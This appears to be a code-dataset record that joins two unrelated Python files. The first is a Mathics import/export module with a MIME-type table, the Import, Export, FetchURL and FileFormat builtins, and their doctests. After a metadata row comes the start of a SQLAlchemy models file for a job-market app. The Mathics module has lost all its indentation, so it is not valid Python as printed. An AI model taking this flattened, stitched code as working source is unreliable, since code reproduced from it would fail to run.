from urllib2 import HTTPError, URLError
mimetypes.add_type('application/vnd.wolfram.mathematica.package', '.m')
# Seems that JSON is not registered on the mathics.net server, so we do it manually here.
# Keep in mind that mimetypes has system-dependent aspects (it inspects "/etc/mime.types" and other files).
mimetypes.add_type('application/json', '.json')
# TODO: Add more file formats
mimetype_dict = {
'application/dicom': 'DICOM',
'application/dbase': 'DBF',
'application/dbf': 'DBF',
'application/eps': 'EPS',
'application/fits': 'FITS',
'application/json': 'JSON',
'application/mathematica': 'NB',
'application/mdb': 'MDB',
'application/mbox': 'MBOX',
'application/msaccess': 'MDB',
'application/octet-stream': 'OBJ',
'application/pdf': 'PDF',
'application/pcx': 'PCX',
'application/postscript': 'EPS',
'application/rss+xml': 'RSS',
'application/rtf': 'RTF',
'application/sla': 'STL',
'application/tga': 'TGA',
'application/vnd.google-earth.kml+xml': 'KML',
'application/vnd.ms-excel': 'XLS',
'application/vnd.ms-pki.stl': 'STL',
'application/vnd.oasis.opendocument.spreadsheet': 'ODS',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet': 'XLSX', # nopep8
'application/vnd.sun.xml.calc': 'SXC',
'application/vnd.msaccess': 'MDB',
'application/vnd.wolfram.cdf': 'CDF',
'application/vnd.wolfram.cdf.text': 'CDF',
'application/vnd.wolfram.mathematica.package': 'Package',
'application/xhtml+xml': 'XHTML',
'application/xml': 'XML',
'application/x-3ds': '3DS',
'application/x-cdf': 'NASACDF',
'application/x-eps': 'EPS',
'application/x-flac': 'FLAC',
'application/x-font-bdf': 'BDF',
'application/x-hdf': 'HDF',
'application/x-msaccess': 'MDB',
'application/x-netcdf': 'NetCDF',
'application/x-shockwave-flash': 'SWF',
'application/x-tex': 'TeX', # Also TeX
'audio/aiff': 'AIFF',
'audio/basic': 'AU', # Also SND
'audio/midi': 'MIDI',
'audio/x-aifc': 'AIFF',
'audio/x-aiff': 'AIFF',
'audio/x-flac': 'FLAC',
'audio/x-wav': 'WAV',
'chemical/seq-na-genbank': 'GenBank',
'chemical/seq-aa-fasta': 'FASTA',
'chemical/seq-na-fasta': 'FASTA',
'chemical/seq-na-fastq': 'FASTQ',
'chemical/seq-na-sff': 'SFF',
'chemical/x-cif': 'CIF',
'chemical/x-daylight-smiles': 'SMILES',
'chemical/x-hin': 'HIN',
'chemical/x-jcamp-dx': 'JCAMP-DX',
'chemical/x-mdl-molfile': 'MOL',
'chemical/x-mdl-sdf': 'SDF',
'chemical/x-mdl-sdfile': 'SDF',
'chemical/x-mdl-tgf': 'TGF',
'chemical/x-mmcif': 'CIF',
'chemical/x-mol2': 'MOL2',
'chemical/x-mopac-input': 'Table',
'chemical/x-pdb': 'PDB',
'chemical/x-xyz': 'XYZ',
'image/bmp': 'BMP',
'image/eps': 'EPS',
'image/fits': 'FITS',
'image/gif': 'GIF',
'image/jp2': 'JPEG2000',
'image/jpeg': 'JPEG',
'image/pbm': 'PNM',
'image/pcx': 'PCX',
'image/pict': 'PICT',
'image/png': 'PNG',
'image/svg+xml': 'SVG',
'image/tga': 'TGA',
'image/tiff': 'TIFF',
'image/vnd.dxf': 'DXF',
'image/vnd.microsoft.icon': 'ICO',
'image/x-3ds': '3DS',
'image/x-dxf': 'DXF',
'image/x-exr': 'OpenEXR',
'image/x-icon': 'ICO',
'image/x-ms-bmp': 'BMP',
'image/x-pcx': 'PCX',
'image/x-portable-anymap': 'PNM',
'image/x-portable-bitmap': 'PBM',
'image/x-portable-graymap': 'PGM',
'image/x-portable-pixmap': 'PPM',
'image/x-xbitmap': 'XBM',
'model/x3d+xml': 'X3D',
'model/vrml': 'VRML',
'model/x-lwo': 'LWO',
'model/x-pov': 'POV',
'text/calendar': 'ICS',
'text/comma-separated-values': 'CSV',
'text/csv': 'CSV',
'text/html': 'HTML',
'text/mathml': 'MathML',
'text/plain': 'Text',
'text/rtf': 'RTF',
'text/scriptlet': 'SCT',
'text/tab-separated-values': 'TSV',
'text/texmacs': 'Text',
'text/vnd.graphviz': 'DOT',
'text/x-csrc': 'C',
'text/x-tex': 'TeX',
'text/x-vcalendar': 'VCS',
'text/x-vcard': 'VCF',
'text/xml': 'XML',
'video/avi': 'AVI',
'video/quicktime': 'QuickTime',
'video/x-flv': 'FLV',
# None: 'Binary',
}
IMPORTERS = {}
EXPORTERS = {}
def _importer_exporter_options(available_options, options, evaluation):
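    # Split user-supplied options into stream options (CharacterEncoding,
    # passed on to OpenRead/OpenWrite) and format-specific custom options.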
stream_options = []
custom_options = []
if available_options and available_options.has_form('List', None):
for name in available_options.leaves:
if isinstance(name, String):
py_name = name.get_string_value()
elif isinstance(name, Symbol):
py_name = strip_context(name.get_name())
else:
py_name = None
if py_name:
value = Builtin.get_option(options, py_name, evaluation)
if value is not None:
expr = Expression('Rule', String(py_name), value)
if py_name == 'CharacterEncoding':
stream_options.append(expr)
else:
custom_options.append(expr)
return stream_options, custom_options
class ImportFormats(Predefined):
"""
<dl>
<dt>'$ImportFormats'
<dd>returns a list of file formats supported by Import.
</dl>
>> $ImportFormats
= {...CSV,...JSON,...Text...}
"""
name = '$ImportFormats'
def evaluate(self, evaluation):
return Expression('List', *sorted(IMPORTERS.keys()))
class ExportFormats(Predefined):
"""
<dl>
<dt>'$ExportFormats'
<dd>returns a list of file formats supported by Export.
</dl>
>> $ExportFormats
= {...CSV,...SVG,...Text...}
"""
name = '$ExportFormats'
def evaluate(self, evaluation):
return Expression('List', *sorted(EXPORTERS.keys()))
class RegisterImport(Builtin):
"""
<dl>
<dt>'RegisterImport["$format$", $defaultFunction$]'
<dd>register '$defaultFunction$' as the default function used when importing from a file of type '"$format$"'.
<dt>'RegisterImport["$format$", {"$elem1$" :> $conditionalFunction1$, "$elem2$" :> $conditionalFunction2$, ..., $defaultFunction$}]'
<dd>registers multiple elements ($elem1$, ...) and their corresponding converter functions ($conditionalFunction1$, ...) in addition to the $defaultFunction$.
<dt>'RegisterImport["$format$", {"$conditionalFunctions$, $defaultFunction$, "$elem3$" :> $postFunction3$, "$elem4$" :> $postFunction4$, ...}]'
      <dd>also registers additional elements ($elem3$, ...) whose converters ($postFunction3$, ...) act on output from the low-level functions.
</dl>
First, define the default function used to import the data.
>> ExampleFormat1Import[filename_String] := Module[{stream, head, data}, stream = OpenRead[filename]; head = ReadList[stream, String, 2]; data = Partition[ReadList[stream, Number], 2]; Close[stream]; {"Header" -> head, "Data" -> data}]
'RegisterImport' is then used to register the above function to a new data format.
>> ImportExport`RegisterImport["ExampleFormat1", ExampleFormat1Import]
>> FilePrint["ExampleData/ExampleData.txt"]
| Example File Format
| Created by Angus
| 0.629452 0.586355
| 0.711009 0.687453
| 0.246540 0.433973
| 0.926871 0.887255
| 0.825141 0.940900
| 0.847035 0.127464
| 0.054348 0.296494
| 0.838545 0.247025
| 0.838697 0.436220
| 0.309496 0.833591
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat1", "Elements"}]
= {Data, Header}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat1", "Header"}]
= {Example File Format, Created by Angus}
Conditional Importer:
>> ExampleFormat2DefaultImport[filename_String] := Module[{stream, head}, stream = OpenRead[filename]; head = ReadList[stream, String, 2]; Close[stream]; {"Header" -> head}]
>> ExampleFormat2DataImport[filename_String] := Module[{stream, data}, stream = OpenRead[filename]; Skip[stream, String, 2]; data = Partition[ReadList[stream, Number], 2]; Close[stream]; {"Data" -> data}]
>> ImportExport`RegisterImport["ExampleFormat2", {"Data" :> ExampleFormat2DataImport, ExampleFormat2DefaultImport}]
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Elements"}]
= {Data, Header}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Header"}]
= {Example File Format, Created by Angus}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Data"}] // Grid
= 0.629452 0.586355
.
. 0.711009 0.687453
.
. 0.24654 0.433973
.
. 0.926871 0.887255
.
. 0.825141 0.9409
.
. 0.847035 0.127464
.
. 0.054348 0.296494
.
. 0.838545 0.247025
.
. 0.838697 0.43622
.
. 0.309496 0.833591
"""
context = 'ImportExport`'
attributes = ('Protected', 'ReadProtected')
# XXX OptionsIssue
options = {
'Path': 'Automatic',
'FunctionChannels': '{"FileNames"}',
'Sources': 'None',
'DefaultElement': 'Automatic',
'AvailableElements': 'None',
'Options': '{}',
'OriginalChannel': 'False',
'BinaryFormat': 'False',
'Encoding': 'False',
'Extensions': '{}',
'AlphaChannel': 'False',
}
rules = {
'ImportExport`RegisterImport[formatname_String, function_]':
'ImportExport`RegisterImport[formatname, function, {}]',
}
def apply(self, formatname, function, posts, evaluation, options):
'''ImportExport`RegisterImport[formatname_String, function_, posts_,
OptionsPattern[ImportExport`RegisterImport]]'''
if function.has_form('List', None):
leaves = function.get_leaves()
else:
leaves = [function]
if not (len(leaves) >= 1 and isinstance(leaves[-1], Symbol) and
all(x.has_form('RuleDelayed', None) for x in leaves[:-1])):
# TODO: Message
return Symbol('$Failed')
conditionals = {
elem.get_string_value(): expr for (elem, expr) in
(x.get_leaves() for x in leaves[:-1])}
default = leaves[-1]
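        # NOTE: the 'posts' argument is discarded here; post-processing
        # elements are not yet honored by this importer registration.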
posts = {}
IMPORTERS[formatname.get_string_value()] = (conditionals, default, posts, options)
return Symbol('Null')
class RegisterExport(Builtin):
"""
<dl>
<dt>'RegisterExport["$format$", $func$]'
      <dd>register '$func$' as the default function used when exporting to a file of type '"$format$"'.
</dl>
Simple text exporter
>> ExampleExporter1[filename_, data_, opts___] := Module[{strm = OpenWrite[filename], char = data}, WriteString[strm, char]; Close[strm]]
>> ImportExport`RegisterExport["ExampleFormat1", ExampleExporter1]
>> Export["sample.txt", "Encode this string!", "ExampleFormat1"];
>> FilePrint["sample.txt"]
| Encode this string!
#> DeleteFile["sample.txt"]
Very basic encrypted text exporter
>> ExampleExporter2[filename_, data_, opts___] := Module[{strm = OpenWrite[filename], char}, (* TODO: Check data *) char = FromCharacterCode[Mod[ToCharacterCode[data] - 84, 26] + 97]; WriteString[strm, char]; Close[strm]]
>> ImportExport`RegisterExport["ExampleFormat2", ExampleExporter2]
>> Export["sample.txt", "encodethisstring", "ExampleFormat2"];
>> FilePrint["sample.txt"]
| rapbqrguvffgevat
#> DeleteFile["sample.txt"]
"""
context = 'ImportExport`'
options = {
'Path': 'Automatic',
'FunctionChannels': '{"FileNames"}',
'Sources': 'None',
'DefaultElement': 'None',
'AvailableElements': 'None',
'Options': '{}',
'OriginalChannel': 'False',
'BinaryFormat': 'False',
'Encoding': 'False',
'Extensions': '{}',
'AlphaChannel': 'False',
}
def apply(self, formatname, function, evaluation, options):
'''ImportExport`RegisterExport[formatname_String, function_,
OptionsPattern[ImportExport`RegisterExport]]'''
EXPORTERS[formatname.get_string_value()] = (function, options)
return Symbol('Null')
class FetchURL(Builtin):
'''
#> Quiet[FetchURL["https:////", {}]]
= $Failed
#> Quiet[FetchURL["http://mathics.org/url_test_case", {}]]
= $Failed
'''
messages = {
'httperr': '`1` could not be retrieved; `2`.',
}
def apply(self, url, elements, evaluation, options={}):
'FetchURL[url_String, elements_, OptionsPattern[]]'
import tempfile
import os
py_url = url.get_string_value()
temp_handle, temp_path = tempfile.mkstemp(suffix='')
try:
# some pages need cookies or they will end up in an infinite redirect (i.e. HTTP 303)
# loop, which prevents the page from getting loaded.
f = urllib2.build_opener(urllib2.HTTPCookieProcessor).open(py_url)
try:
if sys.version_info >= (3, 0):
content_type = f.info().get_content_type()
else:
content_type = f.headers['content-type']
os.write(temp_handle, f.read())
finally:
f.close()
# on some OS (e.g. Windows) all writers need to be closed before another
# reader (e.g. Import._import) can access it. so close the file here.
os.close(temp_handle)
def determine_filetype():
return mimetype_dict.get(content_type)
result = Import._import(temp_path, determine_filetype, elements, evaluation, options)
except HTTPError as e:
evaluation.message(
'FetchURL', 'httperr', url,
'the server returned an HTTP status code of %s (%s)' % (e.code, str(e.reason)))
return Symbol('$Failed')
except URLError as e: # see https://docs.python.org/3/howto/urllib2.html
if hasattr(e, 'reason'):
evaluation.message('FetchURL', 'httperr', url, str(e.reason))
elif hasattr(e, 'code'):
evaluation.message('FetchURL', 'httperr', url, 'server returned %s' % e.code)
return Symbol('$Failed')
except ValueError as e:
evaluation.message('FetchURL', 'httperr', url, str(e))
return Symbol('$Failed')
finally:
os.unlink(temp_path)
return result
class Import(Builtin):
"""
<dl>
<dt>'Import["$file$"]'
<dd>imports data from a file.
<dt>'Import["$file$", $elements$]'
<dd>imports the specified elements from a file.
<dt>'Import["http://$url$", ...]' and 'Import["ftp://$url$", ...]'
<dd>imports from a URL.
</dl>
#> Import["ExampleData/ExampleData.tx"]
: File not found during Import.
= $Failed
#> Import[x]
: First argument x is not a valid file, directory, or URL specification.
= $Failed
## CSV
#> Import["ExampleData/numberdata.csv", "Elements"]
= {Data, Grid}
#> Import["ExampleData/numberdata.csv", "Data"]
= {{0.88, 0.60, 0.94}, {0.76, 0.19, 0.51}, {0.97, 0.04, 0.26}, {0.33, 0.74, 0.79}, {0.42, 0.64, 0.56}}
#> Import["ExampleData/numberdata.csv"]
= {{0.88, 0.60, 0.94}, {0.76, 0.19, 0.51}, {0.97, 0.04, 0.26}, {0.33, 0.74, 0.79}, {0.42, 0.64, 0.56}}
#> Import["ExampleData/numberdata.csv", "FieldSeparators" -> "."]
= {{0, 88,0, 60,0, 94}, {0, 76,0, 19,0, 51}, {0, 97,0, 04,0, 26}, {0, 33,0, 74,0, 79}, {0, 42,0, 64,0, 56}}
## Text
>> Import["ExampleData/ExampleData.txt", "Elements"]
= {Data, Lines, Plaintext, String, Words}
>> Import["ExampleData/ExampleData.txt", "Lines"]
= ...
#> Import["ExampleData/Middlemarch.txt"];
: An invalid unicode sequence was encountered and ignored.
#> StringTake[Import["ExampleData/Middlemarch.txt", CharacterEncoding -> "ISO8859-1"], {21, 69}]
= Le sentiment de la fausseté des plaisirs présents
## JSON
>> Import["ExampleData/colors.json"]
= {colorsArray -> {{colorName -> black, rgbValue -> (0, 0, 0), hexValue -> #000000}, {colorName -> red, rgbValue -> (255, 0, 0), hexValue -> #FF0000}, {colorName -> green, rgbValue -> (0, 255, 0), hexValue -> #00FF00}, {colorName -> blue, rgbValue -> (0, 0, 255), hexValue -> #0000FF}, {colorName -> yellow, rgbValue -> (255, 255, 0), hexValue -> #FFFF00}, {colorName -> cyan, rgbValue -> (0, 255, 255), hexValue -> #00FFFF}, {colorName -> magenta, rgbValue -> (255, 0, 255), hexValue -> #FF00FF}, {colorName -> white, rgbValue -> (255, 255, 255), hexValue -> #FFFFFF}}}
## XML
#> Import["ExampleData/InventionNo1.xml", "Tags"]
= {accidental, alter, arpeggiate, ..., words}
"""
messages = {
'nffil': 'File not found during Import.',
'chtype': ('First argument `1` is not a valid file, directory, '
'or URL specification.'),
'noelem': (
'The Import element `1` is not present when importing as `2`.'),
'fmtnosup': '`1` is not a supported Import format.',
}
rules = {
'Import[filename_]': 'Import[filename, {}]',
}
def apply(self, filename, evaluation, options={}):
'Import[filename_, OptionsPattern[]]'
return self.apply_elements(filename, Expression('List'), evaluation, options)
def apply_element(self, filename, element, evaluation, options={}):
'Import[filename_, element_String, OptionsPattern[]]'
return self.apply_elements(filename, Expression('List', element), evaluation, options)
def apply_elements(self, filename, elements, evaluation, options={}):
'Import[filename_, elements_List?(AllTrue[#, NotOptionQ]&), OptionsPattern[]]'
# Check filename
path = filename.to_python()
if not (isinstance(path, six.string_types) and path[0] == path[-1] == '"'):
evaluation.message('Import', 'chtype', filename)
return Symbol('$Failed')
# Download via URL
if isinstance(filename, String):
if any(filename.get_string_value().startswith(prefix) for prefix in ('http://', 'https://', 'ftp://')):
return Expression('FetchURL', filename, elements, *options_to_rules(options))
# Load local file
findfile = Expression('FindFile', filename).evaluate(evaluation)
if findfile == Symbol('$Failed'):
evaluation.message('Import', 'nffil')
return findfile
def determine_filetype():
return Expression('FileFormat', findfile).evaluate(
evaluation=evaluation).get_string_value()
return self._import(findfile, determine_filetype, elements, evaluation, options)
@staticmethod
def _import(findfile, determine_filetype, elements, evaluation, options):
# Check elements
if elements.has_form('List', None):
elements = elements.get_leaves()
else:
elements = [elements]
for el in elements:
if not isinstance(el, String):
evaluation.message('Import', 'noelem', el)
return Symbol('$Failed')
elements = [el.get_string_value() for el in elements]
# Determine file type
for el in elements:
if el in IMPORTERS.keys():
filetype = el
elements.remove(el)
break
else:
filetype = determine_filetype()
if filetype not in IMPORTERS.keys():
evaluation.message('Import', 'fmtnosup', filetype)
return Symbol('$Failed')
# Load the importer
(conditionals, default_function, posts, importer_options) = IMPORTERS[filetype]
stream_options, custom_options = _importer_exporter_options(
importer_options.get("System`Options"), options, evaluation)
function_channels = importer_options.get("System`FunctionChannels")
if function_channels is None:
# TODO message
return Symbol('$Failed')
default_element = importer_options.get("System`DefaultElement")
if default_element is None:
# TODO message
return Symbol('$Failed')
def get_results(tmp_function):
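            # Run the importer either on the file name or on an open stream
            # (per FunctionChannels) and turn its returned list of rules into
            # an {element: expression} dict.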
if function_channels == Expression('List', String('FileNames')):
joined_options = list(chain(stream_options, custom_options))
tmp = Expression(tmp_function, findfile, *joined_options).evaluate(evaluation)
elif function_channels == Expression('List', String('Streams')):
stream = Expression('OpenRead', findfile, *stream_options).evaluate(evaluation)
if stream.get_head_name() != 'System`InputStream':
evaluation.message('Import', 'nffil')
return None
tmp = Expression(tmp_function, stream, *custom_options).evaluate(evaluation)
Expression('Close', stream).evaluate(evaluation)
else:
# TODO message
return Symbol('$Failed')
tmp = tmp.get_leaves()
if not all(expr.has_form('Rule', None) for expr in tmp):
return None
# return {a.get_string_value() : b for (a,b) in map(lambda x:
# x.get_leaves(), tmp)}
return dict((a.get_string_value(), b)
for (a, b) in [x.get_leaves() for x in tmp])
# Perform the import
defaults = None
if not elements:
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
if default_element == Symbol("Automatic"):
return Expression('List', *(
Expression('Rule', String(key), defaults[key])
for key in defaults.keys()))
else:
result = defaults.get(default_element.get_string_value())
if result is None:
evaluation.message('Import', 'noelem', default_element,
from_python(filetype))
return Symbol('$Failed')
return result
else:
assert len(elements) == 1
el = elements[0]
if el == "Elements":
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
# Use set() to remove duplicates
return from_python(sorted(set(
list(conditionals.keys()) + list(defaults.keys()) + list(posts.keys()))))
else:
if el in conditionals.keys():
result = get_results(conditionals[el])
if result is None:
return Symbol('$Failed')
if len(list(result.keys())) == 1 and list(result.keys())[0] == el:
return list(result.values())[0]
elif el in posts.keys():
# TODO: allow use of conditionals
result = get_results(posts[el])
if result is None:
return Symbol('$Failed')
else:
if defaults is None:
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
if el in defaults.keys():
return defaults[el]
else:
evaluation.message('Import', 'noelem', from_python(el),
from_python(filetype))
return Symbol('$Failed')
class Export(Builtin):
"""
<dl>
<dt>'Export["$file$.$ext$", $expr$]'
<dd>exports $expr$ to a file, using the extension $ext$ to determine the format.
<dt>'Export["$file$", $expr$, "$format$"]'
<dd>exports $expr$ to a file in the specified format.
<dt>'Export["$file$", $exprs$, $elems$]'
<dd>exports $exprs$ to a file as elements specified by $elems$.
</dl>
## Invalid Filename
#> Export["abc.", 1+2]
: Cannot infer format of file abc..
= $Failed
#> Export[".ext", 1+2]
: Cannot infer format of file .ext.
= $Failed
#> Export[x, 1+2]
: First argument x is not a valid file specification.
= $Failed
## Explicit Format
#> Export["abc.txt", 1+x, "JPF"]
: {JPF} is not a valid set of export elements for the Text format.
= $Failed
#> Export["abc.txt", 1+x, {"JPF"}]
: {JPF} is not a valid set of export elements for the Text format.
= $Failed
## Empty elems
#> Export["123.txt", 1+x, {}]
= 123.txt
#> Export["123.jcp", 1+x, {}]
: Cannot infer format of file 123.jcp.
= $Failed
## Compression
## #> Export["abc.txt", 1+x, "ZIP"] (* MMA Bug - Export::type *)
## : {ZIP} is not a valid set of export elements for the Text format.
## = $Failed
## #> Export["abc.txt", 1+x, "BZIP"] (* MMA Bug - General::stop *)
## : {BZIP} is not a valid set of export elements for the Text format.
## = $Failed
## #> Export["abc.txt", 1+x, {"BZIP", "ZIP", "Text"}]
## = abc.txt
## #> Export["abc.txt", 1+x, {"GZIP", "Text"}]
## = abc.txt
## #> Export["abc.txt", 1+x, {"BZIP2", "Text"}]
## = abc.txt
## FORMATS
## Text
#> Export["abc.txt", 1 + x + y]
= abc.txt
#> FilePrint[%]
| 1 + x + y
#> DeleteFile[%%]
#> Export["abc.txt", "ä", CharacterEncoding -> "ISOLatin1"];
#> strm = OpenRead["abc.txt", BinaryFormat -> True];
#> BinaryRead[strm]
= 228
#> Close[strm];
#> DeleteFile["abc.txt"];
#> Export["abc.txt", "ä", CharacterEncoding -> "UTF-8"];
#> strm = OpenRead["abc.txt", BinaryFormat -> True];
#> BinaryRead[strm]
= 195
#> Close[strm];
#> DeleteFile["abc.txt"];
## CSV
#> Export["abc.csv", {{1, 2, 3}, {4, 5, 6}}]
= abc.csv
#> FilePrint[%]
| 1,2,3
| 4,5,6
#> DeleteFile[%%]
## SVG
#> Export["sine.svg", Plot[Sin[x], {x,0,1}]]
= sine.svg
#> FileFormat[%]
= SVG
#> DeleteFile[%%]
"""
messages = {
'chtype': "First argument `1` is not a valid file specification.",
'infer': "Cannot infer format of file `1`.",
'noelem': "`1` is not a valid set of export elements for the `2` format.",
}
_extdict = {
'bmp': 'BMP',
'gif': 'GIF',
'jp2': 'JPEG2000',
'jpg': 'JPEG',
'pcx': 'PCX',
'png': 'PNG',
'ppm': 'PPM',
'pbm': 'PBM',
'pgm': 'PGM',
'tif': 'TIFF',
'txt': 'Text',
'csv': 'CSV',
'svg': 'SVG',
}
rules = {
'Export[filename_, expr_, elems_?NotListQ]': (
'Export[filename, expr, {elems}]'),
}
def apply(self, filename, expr, evaluation, options={}):
"Export[filename_, expr_, OptionsPattern[]]"
# Check filename
if not self._check_filename(filename, evaluation):
return Symbol('$Failed')
# Determine Format
form = self._infer_form(filename, evaluation)
if form is None:
evaluation.message('Export', 'infer', filename)
return Symbol('$Failed')
else:
return self.apply_elements(filename, expr, String(form), evaluation, options)
def apply_element(self, filename, expr, element, evaluation, options={}):
'Export[filename_, expr_, element_String, OptionsPattern[]]'
return self.apply_elements(filename, expr, Expression('List', element), evaluation, options)
def apply_elements(self, filename, expr, elems, evaluation, options={}):
"Export[filename_, expr_, elems_List?(AllTrue[#, NotOptionQ]&), OptionsPattern[]]"
# Check filename
if not self._check_filename(filename, evaluation):
return Symbol('$Failed')
# Process elems {comp* format?, elem1*}
leaves = elems.get_leaves()
format_spec, elems_spec = [], []
found_form = False
for leaf in leaves[::-1]:
leaf_str = leaf.get_string_value()
if not found_form and leaf_str in EXPORTERS:
found_form = True
if found_form:
format_spec.append(leaf_str)
else:
elems_spec.append(leaf)
# Infer format if not present
if not found_form:
assert format_spec == []
format_spec = self._infer_form(filename, evaluation)
if format_spec is None:
evaluation.message('Export', 'infer', filename)
return Symbol('$Failed')
format_spec = [format_spec]
else:
assert format_spec != []
# First item in format_spec is the explicit format.
# The other elements (if present) are compression formats
if elems_spec != []: # FIXME: support elems
evaluation.message(
'Export', 'noelem', elems, String(format_spec[0]))
return Symbol('$Failed')
# Load the exporter
exporter_symbol, exporter_options = EXPORTERS[format_spec[0]]
stream_options, custom_options = _importer_exporter_options(
exporter_options.get("System`Options"), options, evaluation)
exporter_function = Expression(
exporter_symbol, filename, expr, *list(chain(stream_options, custom_options)))
if exporter_function.evaluate(evaluation) == Symbol('Null'):
return filename
return Symbol('$Failed')
def _check_filename(self, filename, evaluation):
path = filename.to_python()
if isinstance(path, six.string_types) and path[0] == path[-1] == '"':
return True
evaluation.message('Export', 'chtype', filename)
return False
def _infer_form(self, filename, evaluation):
ext = Expression('FileExtension', filename).evaluate(evaluation)
ext = ext.get_string_value().lower()
return self._extdict.get(ext)
class FileFormat(Builtin):
"""
<dl>
<dt>'FileFormat["$name$"]'
<dd>attempts to determine what format 'Import' should use to import specified file.
</dl>
>> FileFormat["ExampleData/sunflowers.jpg"]
= JPEG
## UTF-8 Unicode text
>> FileFormat["ExampleData/EinsteinSzilLetter.txt"]
= Text
>> FileFormat["ExampleData/lena.tif"]
= TIFF
## ASCII text
#> FileFormat["ExampleData/BloodToilTearsSweat.txt"]
= Text
#> FileFormat["ExampleData/MadTeaParty.gif"]
= GIF
#> FileFormat["ExampleData/moon.tif"]
= TIFF
#> FileFormat["ExampleData/numberdata.csv"]
= CSV
#> FileFormat["ExampleData/EinsteinSzilLetter.txt"]
= Text
#> FileFormat["ExampleData/BloodToilTearsSweat.txt"]
= Text
#> FileFormat["ExampleData/benzene.xyz"]
= XYZ
#> FileFormat["ExampleData/colors.json"]
= JSON
#> FileFormat["ExampleData/some-typo.extension"]
: File not found during FileFormat[ExampleData/some-typo.extension].
= $Failed
#> FileFormat["ExampleData/Testosterone.svg"]
= SVG
#> FileFormat["ExampleData/colors.json"]
= JSON
#> FileFormat["ExampleData/InventionNo1.xml"]
= XML
"""
messages = {
'nffil': 'File not found during `1`.',
}
detector = None
def apply(self, filename, evaluation):
'FileFormat[filename_String]'
findfile = Expression('FindFile', filename).evaluate(evaluation)
if findfile == Symbol('$Failed'):
evaluation.message(
'FileFormat', 'nffil', Expression('FileFormat', filename))
return findfile
path = findfile.get_string_value()
if not FileFormat.detector:
loader = magic.MagicLoader()
loader.load()
FileFormat.detector = magic.MagicDetector(loader.mimetypes)
mime = set(FileFormat.detector.match(path))
        # If MIME sniffing fails, fall back to matching on the file extension only.
if mime == set([]):
mime, encoding = mimetypes.guess_type(path)
if mime is None:
mime = set([])
else:
mime = set([mime])
result = []
for key in mimetype_dict.keys():
if key in mime:
result.append(mimetype_dict[key])
# the following fixes an extremely annoying behaviour on some (not all)
# installations of Windows, where we end up classifying .csv files als XLS.
if len(result) == 1 and result[0] == 'XLS' and path.lower().endswith('.csv'):
return String('CSV')
if len(result) == 0:
result = 'Binary'
elif len(result) == 1:
result = result[0]
else:
return None
return from_python(result)
| gpl-3.0 | -858,749,363,756,354,700 | 33.307223 | 575 | 0.570454 | false | 3.656114 | false | false | false |
kdurril/internaljobmarket | internaljobmarket/models_base.py | 1 | 8051 | from sqlalchemy import Column, Integer, String, ForeignKey, Table, UniqueConstraint, ForeignKeyConstraint
from sqlalchemy.orm import relationship
from internaljobmarket.database import Base
roleplay = '''
class Role(Base):
__tablename__ = "roles"
id = Column(Integer, primary_key=True)
name = Column(String(64), unique=True)
users = relationship("User", backref="role")
def __init__(self, name=None, users=None):
self.name = name
self.users = users
def __repr__(self):
return 'Role {0}'.format(self.name)
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
username = Column(String(64), unique=True, index=True)
role_id = Column(Integer, ForeignKey("roles.id"))
def __init__(self, username=None, role_id=None):
self.username=username
self.role_id=role_id
def __repr__(self):
return 'User {0}'.format(self.name)
'''
class StudentModel(Base):
__tablename__ = 'student'
student_id = Column(Integer, primary_key=True)
studentUid = Column(String(9), unique=True)
nameLast = Column(String(120))
nameFirst = Column(String(120))
email = Column(String(120))
phone = Column(String(120))
major = Column(String(120))
programCode = Column(String(120))
semBegin = Column(String(120))
graduationExpected = Column(String(120))
creditFall = Column(Integer)
creditSpring = Column(Integer)
request201408 = Column(String(120))
request201501 = Column(String(120))
position = relationship("ApplicationModel", backref='StudentModel')
def __init__(self, student_id=None,
studentUid=None, nameLast=None,
nameFirst=None, email=None,
phone=None, major=None,
programCode=None, semBegin=None,
graduationExpected=None, creditFall=None,
creditSpring=None, request201408=None,
request201501=None):
self.student_id = student_id
self.studentUid = studentUid
self.nameLast = nameLast
self.nameFirst = nameFirst
self.email = email
self.phone = phone
self.major = major
self.programCode = programCode
self.semBegin = semBegin
self.graduationExpected = graduationExpected
self.creditFall = creditFall
self.creditSpring = creditSpring
self.request201408 = request201408
self.request201501 = request201501
def __repr__(self):
return '<Student {0}>'.format(self.studentUid)
class SupervisorModel(Base):
__tablename__ = 'supervisor'
supervisor_id = Column(Integer, primary_key=True)
nameLast = Column(String(120))
nameFirst = Column(String(120))
phone = Column(String(120))
email = Column(String(120))
room = Column(String(120))
center = Column(String(120))
position = relationship("PositionModel", backref='SupervisorModel')
def __init__(self, supervisor_id=None,
nameLast=None, nameFirst=None,
phone=None, email=None,
room=None, center=None
):
self.supervisor_id = supervisor_id
self.nameLast = nameLast
self.nameFirst = nameFirst
self.phone = phone
self.email = email
self.room = room
self.center = center
def __repr__(self):
return '<Supervisor {0}>'.format(self.supervisor_id)
class PositionModel(Base):
__tablename__ = 'position'
position_id = Column(Integer, primary_key=True)
title = Column(String(120))
workGroup = Column(String(120))
position_type = Column(String(120))
course = Column(String(120))
programMin = Column(String(120))
programStd = Column(String(120))
positionOverview = Column(String(120))
primaryDuties = Column(String(120))
necessarySkill = Column(String(120))
preferredSkill = Column(String(120))
dateOpen = Column(String(120))
dateClosed = Column(String(120))
available = Column(String(120))
supervisor_id = Column(Integer, ForeignKey("supervisor.supervisor_id"), nullable=False)
supervisor = relationship("ApplicationModel", backref='PositionModel')
superv = relationship("SupervisorModel", primaryjoin=supervisor_id == SupervisorModel.supervisor_id, viewonly=True)
#application = relationship("application", backref='position')
def __init__(self, position_id=None,
title=None, workGroup=None, position_type=None,
course=None, programMin=None, programStd=None,
positionOverview=None, primaryDuties=None,
necessarySkill=None, preferredSkill=None,
dateOpen=None, dateClosed=None,
available=None, supervisor_id=None):
self.position_id = position_id
self.title = title
self.workGroup =workGroup
self.position_type = position_type
self.course = course
self.programMin = programMin
self.programStd = programStd
self.positionOverview = positionOverview
self.primaryDuties = primaryDuties
self.necessarySkill = necessarySkill
self.preferredSkill = preferredSkill
self.dateOpen = dateOpen
